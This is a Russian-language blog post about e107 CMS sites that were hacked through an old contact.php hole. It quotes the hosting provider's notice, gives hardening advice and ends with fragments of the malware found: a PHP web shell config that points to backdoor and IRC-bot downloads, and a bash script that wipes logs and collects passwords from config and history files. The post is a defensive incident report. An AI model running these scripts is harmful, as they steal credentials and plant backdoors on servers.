Хакерами убито несколько сайтов на е107, с версией ядра ниже 0.7.21 (обновлено)

Сегодня утром на почту пришли сообщения о блокировке нескольких хостингов с сайтами на е107, созданными вашим покорным слугой, по причине орудования на оных вредоносного скрипта. Сайты, которые делал уже очень давно, людям, которые давно уже про них забыли и не обновляют их, но всё равно не приятно...


Вот письмо, полученное мной от хостера накануне:

Мы установили факт работы вредоносного программного обеспечения с Вашей услуги
хостинга ХХХХХ.

Мы предполагаем, что Ваша услуга хостинга была взломана.

В настоящее время Ваша услуга хостинга заблокирована в соответствии с
регламентом оказания услуги хостинга.

Вам предоставлен доступ к услуге хостинга по протоколу FTP, для подключения
используйте IP-адрес сервера 1.2.3.4.
Пароли доступа изменены и высланы Вам ранее на контактный адрес по договору.

Вам следует:
- проверить свой компьютер на наличие вирусов;
- проверить содержимое сайта и удалить вредоносный код;
- проверить скрипты сайта на наличие уязвимостей и устранить их;
- обновить систему управления сайтом до актуальной версии;
- на тарифных планах 201 и 301 вместо доступа по протоколу FTP в дальнейшем
использовать протокол SFTP.

Для работы по протоколу SFTP можно использовать программу WinSCP, скачать её
можно на странице http://winscp.net/eng/download.php . Настройки описаны на
странице http://hosting.nic.ru/support/sftp/index.shtml .

Обращаем Ваше внимание, что при работе с услугой хостинга крайне нежелательно
сохранять в программах-клиентах пароли доступа > в целях исключения их кражи.

Просим Вас предоставить отчет о проделанной работе по устранению последствий и
причин взлома.

Предупреждаем Вас, что в повторном случае нарушения регламента услуги хостинга
действие услуги может быть полностью прекращено.
В этом случае для данного домена услуга хостинга и почты предоставляться более
не будет.


Дополнительная информация:

PID  TT  STAT      TIME COMMAND
13533  ??  S      0:00.03 /home/ХХХХ/etc/apache/bin/httpd -f
/home/ХХХХ/etc/httpd.conf
13711  ??  S      0:00.09 /home/ХХХХ/etc/apache/bin/httpd -f
/home/ХХХХ/etc/httpd.conf
46951  ??  Ss     0:01.48 /home/ХХХХ/etc/apache/bin/httpd -f
/home/ХХХХ/etc/httpd.conf
46954  ??  S      0:00.00 /home/ХХХХ/etc/apache/bin/httpd -f
/home/ХХХХ/etc/httpd.conf
57986  ??  S      0:07.99 [bash] (perl5.8.8)
58040  ??  S      0:07.83 [eth0] (perl5.8.8)
61449  ??  S      0:08.17 /sbin/syslogd (perl5.8.8)
28185  p1  S      0:00.03 /bin/bash
28199  p1  R+     0:00.00 ps axf


Будьте внимательны!

Обновите версию ядра вашей cms e107, не ждите до тех пор пока вам об этом сообщат)

Основные уязвимые места:

Файлик contact.php - огромная дыра, удалите его немедленно, если версия CMS e107 ниже 0.7.21. Используйте в качестве файла контактов любую страничку. А лучше немедленно обновитесь, если Вас еще не взломали.

Проверьте все файлы, что кажутся Вам посторонними:

1. Те файлы, дата создания которых сильно отличается от даты создания всех остальных файлов.
2. Проверьте на наличие посторонних файлов таких как: class.php, find.sh, xmlrpc.php - это лишь часть файлов, которые могут быть загружены подобным образом.
3. Перепроверьте права на все каталоги. Дополнительно читай тут!.
4. Создайте в файле .htaccess переадресацию с contact.php на news.php или index.php

redirect /contact.php /news.php


Дополнение от разработчиков:

1. Запускайте веб-сервер под юзером apache.apache
2. Сделайте владельцем всех исполняемых файлов вашего сайта "all executive core files (*.php, *.sc, *.bb and so on)" другому пользователю, например е107 с правами 644
3. Поставьте права на все папки 755
4. Сделайте владельцем всех директорий юзера e107
5. Сделайте владельцем директорий типа /e107_files/public/avatars итд... пользователя apache.apache (для того, чтобы апач/пхп мог писать в эти папки)
6. Напишите в конфиге апача правила запрета исполнения php-файлов из папок типа /e107_files/public/avatars....


Будьте внимательны! Это не угрозы, а реальная возможность потерять свой сайт, пусть не на всегда, но все же. Не дайте хакерам потешить своё самолюбие, следите за гигиеной ваших серверов и хостингов и к Вам потянутся.

Аминь!

Ниже приведены обрывки содержания нескольких вредоносных скриптов...
Class.PHP

 array($sh_mainurl."cyberz.txt","fx29sh.php"),^M
  "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),^M
  "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),^M
  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),^M
);^M
##[ AUTHENTICATION ]##^M
$auth = array(^M
  "login"     => "",^M
  "pass"      => "",^M
  "md5pass"   => "",^M
  "hostallow" => array("*"),^M
  "denied"    => "".$sh_name.": access denied!",^M
);^M
##[ END AUTHENTICATION ]##^M
$curdir = "./";^M
$tmpdir = "";^M
$tmpdir_logs = "./";^M
$log_email = "";^M
$sess_cookie = "fx29shcook";^M
$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending^M

----CUT -----


Find.SH

#!/bin/bash

#cleaning some fucking logs
rm -rf logs/*
mkdir logs
cd logs
echo "------------------------------------------"
echo "     Password Gathering Tool by invisible"
echo "                                priv8"
echo "------------------------------------------"

echo "# Starting search for PHP config files ... [OK]"
find / -name "*conf*.php" >> log.config 2> /dev/null
echo "# Filtering and dumping information ... [OK]"

for i in `cat log.config`
do
        echo "------------------------------------------" >> php.txt
        echo "# Finding passwords in $i ..." >> php.txt
        cat $i|grep user >> php.txt;cat $i|grep pass >> php.txt
done

rm -f log.config

echo "* We got `wc -l php.txt|awk '{print $1}'` lines of code in logs/php.txt"

if [ "`whoami`" != "nobody" ];then
        echo "------------------------------------------"
        echo "# Starting search in our history files ... [OK]"
        cat ~/.bash_history|grep mysql >> local.txt
        cat ~/.bash_history|grep pass >> local.txt
        cat ~/.mysql_history|grep "\-p" >> local.txt
        if [ ! -f local.txt ];then

                echo "# No passwords found ... [FAILED]"
        else
                echo "# We got `wc -l local.txt|awk '{print $1}'` lines of code in logs/local.txt"
-----CUT-----





Вас также может заинтересовать:

Пробую CMS е107 v0.8 Обновлено!!!
Релиз Linux-ядра 3.0 отложен на несколько дней
Обновление ядра Linux 3.2.8. Несколько DoS-уязвимостей в ядре Linux
Модификация ядра е107 для переадресации внешних ссылок(external)
Один конфиг Nginx для работы с кучей разных сайтов (SEO-сайтов)
Доля Internet Explorer впервые упала ниже 50 процентов